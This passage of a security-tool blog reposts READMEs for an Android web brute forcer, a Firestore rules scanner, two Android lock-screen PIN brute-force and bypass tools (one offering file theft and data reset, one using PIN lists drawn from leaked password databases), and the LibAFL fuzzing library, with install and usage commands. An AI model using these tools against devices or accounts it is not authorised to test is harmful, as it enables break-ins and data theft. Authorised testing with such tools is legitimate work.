src="http://2.bp.blogspot.com/-3yWjJiQNJus/YLcmr3AByZI/AAAAAAAADWg/TiwPdDTYa3YswhnMJeCIfmRD6R4ELHYmwCK4BGAYYCw/s320/Arkhota_9_8-727314.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/9.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. 
(13)"></a><a href="http://4.bp.blogspot.com/-vjUuGR06zKc/YLcmsGgiFOI/AAAAAAAADWo/SJraZbSWEzkUP4p0Hj1-dgCfD18W_CNnQCK4BGAYYCw/s1600/Arkhota_10_9-728314.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081487482295522" src="http://4.bp.blogspot.com/-vjUuGR06zKc/YLcmsGgiFOI/AAAAAAAADWo/SJraZbSWEzkUP4p0Hj1-dgCfD18W_CNnQCK4BGAYYCw/s320/Arkhota_10_9-728314.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/10.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (14)"></a><a href="http://4.bp.blogspot.com/-_zev7MG90bE/YLcmsZL5dSI/AAAAAAAADWw/S1WWNVFywAo0rih8kM5ASpN6kld6RyStwCK4BGAYYCw/s1600/Arkhota_11_10-729011.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081492496020770" src="http://4.bp.blogspot.com/-_zev7MG90bE/YLcmsZL5dSI/AAAAAAAADWw/S1WWNVFywAo0rih8kM5ASpN6kld6RyStwCK4BGAYYCw/s320/Arkhota_11_10-729011.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/pc-1.png" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (15)"></a><a href="http://2.bp.blogspot.com/-KTj5X9enKEc/YLcmsdnnpTI/AAAAAAAADW4/OiKXH1IgZFc3FQ1Fjk61AvxOSSBoqsdzgCK4BGAYYCw/s1600/Arkhota_12_pc-1-729786.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081493686035762" src="http://2.bp.blogspot.com/-KTj5X9enKEc/YLcmsdnnpTI/AAAAAAAADW4/OiKXH1IgZFc3FQ1Fjk61AvxOSSBoqsdzgCK4BGAYYCw/s320/Arkhota_12_pc-1-729786.png" /></a></p> <p><a href="https://www.youtube.com/watch?v=CIazE0Jhj_c" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. 
(16)"></a><br /></p><p style="text-align: center;"><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/CIazE0Jhj_c" title="YouTube video player" width="560"></iframe></p> <br /><span style="font-size: large;"><b>[W]arning</b></span><br /> <br /><b>Runtime changeable parameters</b><br /> <p>Every parameter can be edited during an attack, but none of the edits take effect while the attack is running, with two exceptions: the "Fail/Success" and "Beep" switches.</p> <p>This means: if you have started the attack and want to change a parameter (e.g. the charset), editing it changes nothing; the change applies only after you press the start button again. BUT if you started the attack with the beep option on and want to change it, you don't need to restart the attack: just click the switch and it won't beep when the attack succeeds.</p> <br /><b>About "Generate" & Custom wordlists</b><br /> <p>The Generate option is <strong>NOT</strong> recommended. Generating and parsing at runtime is really hard work for a phone. It is also not stable: all possible words will be generated, but they may not be sequential. If you really need to select it, keep every setting at its minimum. If your phone freezes or crashes, the selected options are not suitable for your phone's processor.</p> <p>Do <strong>NOT</strong> place big <a href="https://www.kitploit.com/search/label/Wordlists" target="_blank" title="wordlists">wordlists</a> in the /ABF/ directory. 
This will cause freezing and crashing.</p> <p>And do <strong>NOT</strong> forget that standard smartphones have far less processing power than a computer; this project is for small and quick attacks.</p> <br /><b>About speed</b><br /> <p>It depends on the speed of your network and of the <a href="https://www.kitploit.com/search/label/Remote" target="_blank" title="remote">remote</a> host.</p> <br /><span style="font-size: large;"><b>How to stop the attack</b></span><br /> <p>This version of Arkhota doesn't support "stopping the attack". <strong>BUT</strong> that doesn't mean you cannot stop it. Just flip the "Fail/Success" switch to the opposite direction and wait for one more request. This causes a false positive on purpose, which stops the attack. Or you can simply close and re-open the application.</p> <br /><b><em><strong>PS: I know... I know... This project gave me a headache, I didn't even try to put a stop button there.</strong></em></b><br /> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ALW1EZ/Arkhota" rel="nofollow" target="_blank" title="Download Arkhota">Download Arkhota</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5180328804030424482021-05-27T08:30:00.011-04:002021-05-27T08:30:00.295-04:00FireStorePwn - Firestore Database Vulnerability Scanner Using APKs<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-mL438l63hTg/YKrzEkXE_-I/AAAAAAAAWRI/87DCc19R3mkIcrf4T7PdNh_tcQ6UoYWVACNcBGAsYHQ/s808/FireStorePwn_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="808" data-original-width="790" height="640" src="https://1.bp.blogspot.com/-mL438l63hTg/YKrzEkXE_-I/AAAAAAAAWRI/87DCc19R3mkIcrf4T7PdNh_tcQ6UoYWVACNcBGAsYHQ/w626-h640/FireStorePwn_1.png" width="626" /></a></div><p><br /></p><p>fsp scans an APK and checks the Firestore database for rules that are not secure, <a 
href="https://www.kitploit.com/search/label/Testing" target="_blank" title="testing">testing</a> with or without authentication.</p> <p>If the security rules are weak, attackers could steal, modify or delete data and run up the bill.</p><span><a name='more'></a></span><h3 align="center"><span style="font-size: x-large;"><b>Install fsp</b></span><br /> <div class="highlight highlight-source-shell position-relative" data-snippet-clipboard-copy-content="sudo wget https://raw.githubusercontent.com/takito1812/FireStorePwn/main/fsp -O /bin/fsp sudo chmod +x /bin/fsp "><pre><code>sudo wget https://raw.githubusercontent.com/takito1812/FireStorePwn/main/fsp -O /bin/fsp<br />sudo chmod +x /bin/fsp</code></pre></div> <br /><b>Running fsp</b><br /> <br /><b>Scanning an APK without authentication</b><br /> <div class="highlight highlight-source-shell position-relative" data-snippet-clipboard-copy-content="fsp app.apk "><pre><code>fsp app.apk</code></pre></div> <br /><b>Scanning an APK with authentication</b><br /> </h3><p>With <a href="https://www.kitploit.com/search/label/Email" target="_blank" title="email">email</a> and password.</p> <div class="highlight highlight-source-shell position-relative" data-snippet-clipboard-copy-content="fsp app.apk test@test.com:123456 "><pre><code>fsp app.apk test@test.com:123456</code></pre></div> <p>With a token.</p> <div class="highlight highlight-source-shell position-relative" data-snippet-clipboard-copy-content="fsp app.apk eyJhbGciO... 
"><pre><code>fsp app.apk eyJhbGciO...</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/takito1812/FireStorePwn" rel="nofollow" target="_blank" title="Download FireStorePwn">Download FireStorePwn</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-47283001476656203832021-05-24T17:30:00.008-04:002021-05-24T17:30:00.302-04:00CiLocks - Android LockScreen Bypass<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gC11e2udHzY/YKru8f-wuYI/AAAAAAAAWQc/EejT8t57b1Uo-8mjMlBFiPaFOqSgGXpBgCNcBGAsYHQ/s650/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="650" height="506" src="https://1.bp.blogspot.com/-gC11e2udHzY/YKru8f-wuYI/AAAAAAAAWQc/EejT8t57b1Uo-8mjMlBFiPaFOqSgGXpBgCNcBGAsYHQ/w640-h506/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" width="640" /></a></div><p><br /></p><p>CiLocks - Android LockScreen Bypass</p><br /><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Brute-force 4-digit PIN</li> <li>Brute-force 6-digit PIN</li> <li>Brute-force lock screen using a wordlist</li> <li>Bypass lock screen {Antiguard} (not supported on all OS versions)</li> <li>Root <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> {Supersu} (not supported on all OS versions)</li> <li>Steal file</li> <li>Reset data</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Required</b></span><br /> <br /> - ADB {Android SDK} <br /> - USB cable <br /> - Rooted Android <a href="https://www.kitploit.com/search/label/Emulator" target="_blank" title="Emulator">Emulator</a> {NetHunter/Termux} <br /> - Or a computer <br /> <br /><span style="font-size: large;"><b> Compatible </b></span><br /> <br /> - Linux <br /> - <a 
href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> <br /> - Mac <br /> <br /><span style="font-size: large;"><b> Tested On </b></span><br /><br /> - <a href="https://www.kitploit.com/search/label/Kali%20Linux" target="_blank" title="Kali Linux">Kali Linux</a> <br /> <br /><span style="font-size: large;"><b> How To Run </b></span><br /><br /> - git clone <a href="https://github.com/tegal1337/CiLocks" rel="nofollow" target="_blank" title="https://github.com/tegal1337/CiLocks">https://github.com/tegal1337/CiLocks</a> <br /> - cd CiLocks <br /> - chmod +x cilocks <br /> - bash cilocks <br /> <br /> <br /><span style="font-size: x-large;"><b> For Android Emulator </b></span><br /> <br /> - Install Busybox <br /> - Root <br /> <br /><b> If <a href="https://www.kitploit.com/search/label/Brute" target="_blank" title="brute">brute</a>-forcing doesn't work, uncomment this line: </b><br /><br /> <code># adb shell input keyevent 26</code> <br /> After 5 wrong passwords there is an automatic 30-second delay.<div> <br /><span style="font-size: large;"><b>Image </b></span><br /><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1jb1PwOotyw/YKrvCT5hkBI/AAAAAAAAWQg/lsvFZOPolQ8y_HhOKjZILre_iRpd9hpSACNcBGAsYHQ/s650/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="650" height="506" src="https://1.bp.blogspot.com/-1jb1PwOotyw/YKrvCT5hkBI/AAAAAAAAWQg/lsvFZOPolQ8y_HhOKjZILre_iRpd9hpSACNcBGAsYHQ/w640-h506/CiLocks_1_Screenshot_2021-05-02_14-32-27.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b> Video</b></span><br /> <br /> Bypass LockScreen <br /> <a href="https://youtu.be/PPMhzt4lGmU" rel="nofollow" target="_blank" title="https://youtu.be/PPMhzt4lGmU">https://youtu.be/PPMhzt4lGmU</a> <br /> BruteForce Pin <br /> <a href="https://youtu.be/D2xjJUQ9Lsw" 
rel="nofollow" target="_blank" title="https://youtu.be/D2xjJUQ9Lsw">https://youtu.be/D2xjJUQ9Lsw</a> <br /><span style="font-size: large;"><b>Reference And Media</b></span><br /> <br /> <a href="https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb" rel="nofollow" target="_blank" title="https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb">https://stackoverflow.com/questions/29072501/how-to-unlock-android-phone-through-adb</a> <br /> <a href="http://www.hak5.org/episodes/hak5-1205" rel="nofollow" target="_blank" title="http://www.hak5.org/episodes/hak5-1205">http://www.hak5.org/episodes/hak5-1205</a> <br /> <a href="https://github.com/kosborn/p2p-adb" rel="nofollow" target="_blank" title="https://github.com/kosborn/p2p-adb">https://github.com/kosborn/p2p-adb</a> <br /> <a href="https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/" rel="nofollow" target="_blank" title="https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/">https://forum.xda-developers.com/t/universal-guide-root-any-android-device-manually.2684210/</a> <br /> <a href="https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android" rel="nofollow" target="_blank" title="https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android">https://stackoverflow.com/questions/14685721/how-can-i-do-factory-reset-using-adb-in-android</a> <br /> Contact me: <a href="mailto:mitsuhamizaki@gmail.com" rel="nofollow" target="_blank" title="Email">Email</a> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/tegal1337/CiLocks" rel="nofollow" target="_blank" title="Download CiLocks">Download 
CiLocks</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19667631920258967142021-05-04T08:30:00.001-04:002021-05-04T08:30:00.315-04:00LibAFL - Advanced Fuzzing Library - Slot Your Fuzzer Together In Rust! Scales Across Cores And Machines. For Windows, Android, MacOS, Linux, No_Std, ...<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-AT4J9W2Uo1I/YJCFiz1LHMI/AAAAAAAAWEM/qer0ynXBIIYGqbtrm8LwOk0QylDd9ZzYgCNcBGAsYHQ/s256/LibAFL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="256" src="https://1.bp.blogspot.com/-AT4J9W2Uo1I/YJCFiz1LHMI/AAAAAAAAWEM/qer0ynXBIIYGqbtrm8LwOk0QylDd9ZzYgCNcBGAsYHQ/s16000/LibAFL.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p>Advanced <a href="https://www.kitploit.com/search/label/Fuzzing" target="_blank" title="Fuzzing">Fuzzing</a> Library - Slot your own fuzzers together and extend their features using Rust.</p> <p>LibAFL is written and maintained by Andrea Fioraldi <a href="mailto:andreafioraldi@gmail.com" rel="nofollow" target="_blank" title="andreafioraldi@gmail.com">andreafioraldi@gmail.com</a> and Dominik Maier <a href="mailto:mail@dmnk.co" rel="nofollow" target="_blank" title="mail@dmnk.co">mail@dmnk.co</a>.</p> <br /><span style="font-size: large;"><b>Why LibAFL?</b></span><br /> <p>LibAFL gives you many of the benefits of an off-the-shelf fuzzer, while being completely customizable. Some <a href="https://www.kitploit.com/search/label/Highlight" target="_blank" title="highlight">highlight</a> features currently include:</p> <ul> <li><code>fast</code>: We do everything we can at compile time, keeping runtime overhead minimal. 
Users reach 120k execs/sec in frida-mode on a phone (using all cores).</li> <li><code>scalable</code>: <code>Low Level Message Passing</code>, <code>LLMP</code> for short, allows LibAFL to scale almost linearly over cores, and via TCP to multiple machines soon!</li> <li><code>adaptable</code>: You can replace each part of LibAFL. For example, <code>BytesInput</code> is just one potential form of input: feel free to add an AST-based input for structured fuzzing, and more.</li> <li><code>multi platform</code>: LibAFL was confirmed to work on <em>Windows</em>, <em>MacOS</em>, <em>Linux</em>, and <em>Android</em> on <em>x86_64</em> and <em>aarch64</em>. <code>LibAFL</code> can be built in <code>no_std</code> mode to inject LibAFL into obscure targets like <a href="https://www.kitploit.com/search/label/Embedded" target="_blank" title="embedded">embedded</a> devices and hypervisors.</li> <li><code>bring your own target</code>: We support binary-only modes, like Frida-Mode, as well as multiple compilation passes for source-based instrumentation. Of course it's easy to add custom <a href="https://www.kitploit.com/search/label/Instrumentation" target="_blank" title="instrumentation">instrumentation</a> backends.</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Overview</b></span><br /> <p>LibAFL is a collection of reusable pieces of fuzzers, written in Rust. 
It is fast, multi-platform, no_std compatible, and scales over cores and machines.</p> <p>It offers a main crate that provides building blocks for custom fuzzers, <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl" rel="nofollow" target="_blank" title="libafl">libafl</a>, a library containing common code that can be used for target instrumentation, <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl_targets" rel="nofollow" target="_blank" title="libafl_targets">libafl_targets</a>, and a library providing facilities to wrap compilers, <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl_cc" rel="nofollow" target="_blank" title="libafl_cc">libafl_cc</a>.</p> <p>LibAFL offers integrations with popular instrumentation frameworks. At the moment, the supported backends are:</p> <ul> <li>SanitizerCoverage, in <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl_targets" rel="nofollow" target="_blank" title="libafl_targets">libafl_targets</a></li> <li>Frida, in <a href="https://github.com/AFLplusplus/LibAFL/blob/main/libafl_frida" rel="nofollow" target="_blank" title="libafl_frida">libafl_frida</a>, by s1341 <a href="mailto:github@shmarya.net" rel="nofollow" target="_blank" title="github@shmarya.net">github@shmarya.net</a> (Windows support is broken at the moment; it depends on <a href="https://github.com/meme/frida-rust/issues/9" rel="nofollow" target="_blank" title="this upstream issue">this upstream issue</a> being fixed.)</li> <li>More to come (QEMU-mode, ...)</li> </ul> <br /><span style="font-size: large;"><b>Getting started</b></span><br /> <ol> <li> <p>Install the Rust toolchain. We highly recommend <em>not</em> using e.g. your Linux distribution's package, as it is likely outdated. 
Instead, install Rust directly; instructions can be found <a href="https://www.rust-lang.org/tools/install" rel="nofollow" target="_blank" title="here">here</a>.</p> </li> <li> <p>Clone the LibAFL repository with</p> </li> </ol> <pre><code>git clone https://github.com/AFLplusplus/LibAFL<br /></code></pre> <p>If you want to get the latest and greatest features,</p> <pre><code>git checkout dev<br /></code></pre> <ol start="3"> <li>Build the library using</li> </ol> <pre><code>cargo build --release<br /></code></pre> <ol start="4"> <li>Build the API documentation with</li> </ol> <pre><code>cargo doc<br /></code></pre> <ol start="5"> <li>Browse the LibAFL book (WIP!) with (requires <a href="https://github.com/rust-lang/mdBook" rel="nofollow" target="_blank" title="mdbook">mdbook</a>)</li> </ol> <pre><code>cd docs && mdbook serve<br /></code></pre> <p>We collect all example fuzzers in <a href="https://github.com/AFLplusplus/LibAFL/blob/main/fuzzers" rel="nofollow" target="_blank" title="Advanced Fuzzing Library - Slot your Fuzzer together in Rust! Scales across cores and machines. For Windows, Android, MacOS, Linux, no_std, ... (17)"><code>./fuzzers</code></a>. Be sure to read their documentation (and source); this is <em>the natural way to get started!</em></p> <p>The best-tested fuzzer is <a href="https://github.com/AFLplusplus/LibAFL/blob/main/fuzzers/libfuzzer_libpng" rel="nofollow" target="_blank" title="Advanced Fuzzing Library - Slot your Fuzzer together in Rust! Scales across cores and machines. For Windows, Android, MacOS, Linux, no_std, ... 
(18)"><code>./fuzzers/libfuzzer_libpng</code></a>, a multicore libfuzzer-like fuzzer using LibAFL for a libpng harness.</p> <br /><span style="font-size: large;"><b>Resources</b></span><br /> <ul> <li> <p><a href="https://github.com/AFLplusplus/LibAFL/blob/main/docs/src/getting_started/setup.md" rel="nofollow" target="_blank" title="Installation guide">Installation guide</a></p> </li> <li> <p>Our RC3 <a href="http://www.youtube.com/watch?v=3RWkT1Q5IV0" rel="nofollow" target="_blank" title="talk">talk</a> explaining the core concepts</p> </li> <li> <p><a href="https://docs.rs/libafl/" rel="nofollow" target="_blank" title="Online API documentation">Online API documentation</a></p> </li> <li> <p>The LibAFL book (very WIP) <a href="https://aflplus.plus/libafl-book" rel="nofollow" target="_blank" title="online">online</a> or in the <a href="https://github.com/AFLplusplus/LibAFL/blob/main/docs/src" rel="nofollow" target="_blank" title="repo">repo</a></p> </li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Check the <a href="https://github.com/AFLplusplus/LibAFL/blob/main/TODO.md" rel="nofollow" target="_blank" title="TODO.md">TODO.md</a> file for features that we plan to support.</p> <p>For bugs, feel free to open issues or contact us directly. Thank you for your support. 
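</p>
<p>As an added illustration of the "reusable pieces" the overview above describes (this is example code written for this page, not LibAFL's own code or API), the block below is a minimal coverage-guided fuzz loop in plain Rust with no dependencies. It shows the roles LibAFL separates into components: a harness that records which branches it took in a coverage map, a feedback that keeps an input only when it lights a map slot never seen before, a corpus, a random scheduler and a havoc-style mutator. The harness, its "FUZZ" crash condition, the xorshift PRNG and the seed input are all constructed for the demo.</p>

```rust
// Added example for this page: a toy coverage-guided fuzz loop written from
// scratch (no LibAFL dependency) to show the pieces a fuzzer composes:
// input, harness/executor, coverage observer, feedback, corpus, scheduler, mutator.
// The harness, crash condition, PRNG and seed input are constructed for the demo.

/// Slots in the toy coverage map: one per branch of interest in the harness.
pub const MAP_SIZE: usize = 8;

/// The target under test (a stand-in for real instrumented code). Each branch it
/// takes sets a slot in `map`; reaching the magic header "FUZZ" models a crash.
pub fn harness(input: &[u8], map: &mut [u8; MAP_SIZE]) -> bool {
    map[0] = 1;
    if input.len() < 4 {
        return false;
    }
    map[1] = 1;
    let magic = b"FUZZ";
    for (i, &expected) in magic.iter().enumerate() {
        if input[i] != expected {
            return false;
        }
        map[2 + i] = 1; // one new slot per matched byte, like one new edge per branch
    }
    true // all four bytes matched: the "bug" triggers
}

/// Tiny deterministic PRNG (xorshift64) so runs are reproducible.
pub struct Rng(u64);
impl Rng {
    pub fn new(seed: u64) -> Self {
        Rng(if seed == 0 { 0x9E37_79B9_7F4A_7C15 } else { seed })
    }
    pub fn next_u64(&mut self) -> u64 {
        let mut x = self.0;
        x ^= x << 13;
        x ^= x >> 7;
        x ^= x << 17;
        self.0 = x;
        x
    }
    pub fn below(&mut self, n: usize) -> usize {
        (self.next_u64() % n as u64) as usize
    }
}

/// Feedback: an input is interesting if it lit a coverage slot never seen before.
pub struct NewCoverageFeedback {
    seen: [u8; MAP_SIZE],
}
impl NewCoverageFeedback {
    pub fn new() -> Self {
        Self { seen: [0; MAP_SIZE] }
    }
    pub fn is_interesting(&mut self, map: &[u8; MAP_SIZE]) -> bool {
        let mut novel = false;
        for (seen, &hit) in self.seen.iter_mut().zip(map.iter()) {
            if hit > *seen {
                *seen = hit;
                novel = true;
            }
        }
        novel
    }
}

/// Havoc-style mutator: append a byte, overwrite a byte, or flip one bit.
pub fn mutate(input: &[u8], rng: &mut Rng) -> Vec<u8> {
    let mut out = input.to_vec();
    match rng.below(3) {
        0 if out.len() < 16 => out.push(rng.next_u64() as u8),
        1 if !out.is_empty() => {
            let i = rng.below(out.len());
            out[i] = rng.next_u64() as u8;
        }
        2 if !out.is_empty() => {
            let i = rng.below(out.len());
            out[i] ^= 1u8 << rng.below(8);
        }
        _ => {} // mutation not applicable to this input; return it unchanged
    }
    out
}

pub struct FuzzResult {
    pub executions: usize,
    pub corpus_len: usize,
    pub crash: Option<Vec<u8>>,
}

/// The fuzz loop: schedule a corpus entry, mutate, execute, observe, decide.
pub fn fuzz(seed: u64, max_execs: usize) -> FuzzResult {
    let mut rng = Rng::new(seed);
    let mut feedback = NewCoverageFeedback::new();
    let mut corpus: Vec<Vec<u8>> = Vec::new();
    let mut executions = 0;

    // Seed corpus: one initial input, executed once so its coverage counts as seen.
    let initial = b"AAAA".to_vec();
    let mut map = [0u8; MAP_SIZE];
    harness(&initial, &mut map);
    executions += 1;
    feedback.is_interesting(&map);
    corpus.push(initial);

    while executions < max_execs {
        // Scheduler: pick a parent uniformly at random from the corpus.
        let parent = &corpus[rng.below(corpus.len())];
        let child = mutate(parent, &mut rng);
        // Executor + observer: run the harness against a fresh coverage map.
        let mut map = [0u8; MAP_SIZE];
        let crashed = harness(&child, &mut map);
        executions += 1;
        if crashed {
            return FuzzResult { executions, corpus_len: corpus.len(), crash: Some(child) };
        }
        // Feedback: keep the child only if it reached new coverage.
        if feedback.is_interesting(&map) {
            corpus.push(child);
        }
    }
    FuzzResult { executions, corpus_len: corpus.len(), crash: None }
}

fn main() {
    let result = fuzz(42, 2_000_000);
    match &result.crash {
        Some(input) => println!(
            "crash after {} execs, corpus size {}: {:?}",
            result.executions,
            result.corpus_len,
            String::from_utf8_lossy(input)
        ),
        None => println!("no crash within {} execs", result.executions),
    }
}
```

<p>Run it with <code>cargo run</code>. Because every matched byte of the magic header lights a new map slot, the feedback saves the intermediate inputs ("FAAA", "FUAA", "FUZA") and the loop reaches the crash after on the order of tens of thousands of executions, whereas blind random search over four bytes would need billions. That is the whole point of coverage feedback, and LibAFL's <code>BytesInput</code>, observers, feedbacks, corpora, schedulers and mutators are the production-grade versions of these toy pieces.</p>
<p>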
<3</p> <div><br /></div><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/AFLplusplus/LibAFL" rel="nofollow" target="_blank" title="Download LibAFL">Download LibAFL</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-91350405154304897182021-04-17T08:30:00.033-04:002021-04-17T08:30:00.320-04:00Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vC53ouNt_VU/YHYwLilxXMI/AAAAAAAAV4w/NatBA4yVXqgNYgLW5FmQyx2mpKX8XLMrQCNcBGAsYHQ/s989/Android-PIN-Bruteforce_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="684" data-original-width="989" height="442" src="https://1.bp.blogspot.com/-vC53ouNt_VU/YHYwLilxXMI/AAAAAAAAV4w/NatBA4yVXqgNYgLW5FmQyx2mpKX8XLMrQCNcBGAsYHQ/w640-h442/Android-PIN-Bruteforce_1.png" width="640" /></a></div><p><br /></p> <p>Unlock an Android phone (or device) by <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> the lockscreen PIN.</p> <p>Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices!</p><span style="font-size: large;"><b> How it works</b></span><br /> <p>It uses a USB OTG cable to connect the locked phone to the Nethunter device. It emulates a keyboard, automatically tries PINs, and waits after trying too many wrong guesses.</p> <p>[Nethunter phone] <--> [USB cable] <--> [USB OTG adaptor] <--> [Locked Android phone]</p> <p>The USB HID Gadget driver provides emulation of USB Human Interface Devices (HID). This enables an Android Nethunter device to emulate keyboard input to the locked phone. 
It's just like plugging a keyboard into the locked phone and pressing keys.</p> <p></p><div>This takes just over 16.6 hours with a Samsung S5 to try all possible 4 digit PINs, but with the optimised PIN list it should take you much less time.</div><div><br /></div><b>You will need</b><br /> <ul> <li>A locked Android phone</li> <li>A Nethunter phone (or any rooted Android with HID kernel support)</li> <li>USB OTG (On The Go) cable/adapter (USB male Micro-B to female USB A), and a standard charging cable (USB male Micro-B to male A).</li> <li>That's all!</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b> Benefits</b></span><br /> <ul> <li>Turn your NetHunter phone into an Android PIN cracking machine</li> <li>Unlike other methods, you do not need ADB or USB debugging enabled on the locked phone</li> <li>The locked Android phone does not need to be rooted</li> <li>You don't need to buy special hardware, e.g. Rubber Ducky, Teensy, Cellebrite, XPIN Clip, etc.</li> <li>You can easily modify the backoff time to crack other types of devices</li> <li>It works!</li></ul><div><br /></div><span style="font-size: large;"><b> Features</b></span><br /> <ul> <li>Crack PINs of any length from 1 to 10 digits</li> <li>Use config files to support different phones</li> <li>Optimised PIN lists for 3,4,5, and 6 digit PINs</li> <li>Bypasses phone pop-ups including the Low Power warning</li> <li>Detects when the phone is unplugged or powered off, and waits while retrying every 5 seconds</li> <li>Configurable delays of N seconds after every X PIN attempts</li> <li>Log file</li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>TBC</p> <br /><span style="font-size: large;"><b>Executing the script</b></span><br /> <p>If you installed the script to /sdcard/, you can execute it with the following command.</p> <p><code>bash ./android-pin-bruteforce</code></p> <p>Note that Android mounts /sdcard with the noexec flag. 
You can verify this with <code>mount</code>.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code><br />Android-PIN-Bruteforce (0.1) is used to unlock an Android phone (or device) by bruteforcing the lockscreen PIN.<br /> Find more information at: https://github.com/urbanadventurer/Android-PIN-Bruteforce<br /><br />Commands:<br /> crack Begin cracking PINs<br /> resume Resume from a chosen PIN<br /> rewind Crack PINs in reverse from a chosen PIN<br /> diag Display diagnostic information<br /> version Display version information and exit<br /><br />Options:<br /> -f, --from PIN Resume from this PIN<br /> -a, --attempts Starting from NUM incorrect attempts<br /> -m, --mask REGEX Use a mask for known digits in the PIN<br /> -t, --type TYPE Select PIN or PATTERN cracking<br /> -l, --length NUM Crack PINs of NUM length<br /> -c, --config FILE Specify configuration file to load<br /> -p, --pinlist FILE Specify a custom PIN list<br /> -d, --dry-run Dry run for testing. Does n't send any keys.<br /> -v, --verbose Output verbose logs<br /><br />Usage:<br /> android-pin-bruteforce <command> [options]<br /></code></pre> <br /><span style="font-size: large;"><b>Supported Android Phones/Devices</b></span><br /> <p>This has been successfully tested with various phones including the Samsung S5, S7, Motorola G4 Plus and G5 Plus.</p> <p>It can unlock Android versions 6.0.1 through to 10.0. The ability to perform a bruteforce attack doesn't depend on the Android version in use. 
It depends on how the device vendor developed their own lockscreen.</p> <p>Check the Phone Database for more details: <a href="https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database" rel="nofollow" target="_blank" title="https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database">https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database</a></p><p><br /></p><span style="font-size: large;"><b> PIN Lists</b></span><br /> <p>Optimised PIN lists are used by default unless the user selects a custom PIN list.</p> <br /><b>Cracking PINs of different lengths</b><br /> <p>Use the <code>--length</code> commandline option.</p> <p>Use this command to crack a 3 digit PIN: <code>./android-pin-bruteforce crack --length 3</code></p> <p>Use this command to crack a 6 digit PIN: <code>./android-pin-bruteforce crack --length 6</code></p> <br /><b>Where did the optimised PIN lists come from?</b><br /> <p>The optimised PIN lists were generated by extracting numeric passwords from database leaks and then sorting them by frequency. All PINs that did not appear in the password leaks were appended to the list.</p> <p>The optimised PIN lists were generated from <em>Ga$$Pacc DB Leak</em> (21GB decompressed, 688M Accounts, 243 Databases, 138920 numeric passwords).</p> <br /><b>The 4 digit PIN list</b><br /> <p>The 4 digit PIN list is taken from a different source because it gives better results than the list generated from <em>Ga$$Pacc DB Leak</em>.</p> <p><code>optimised-pin-length-4.txt</code> 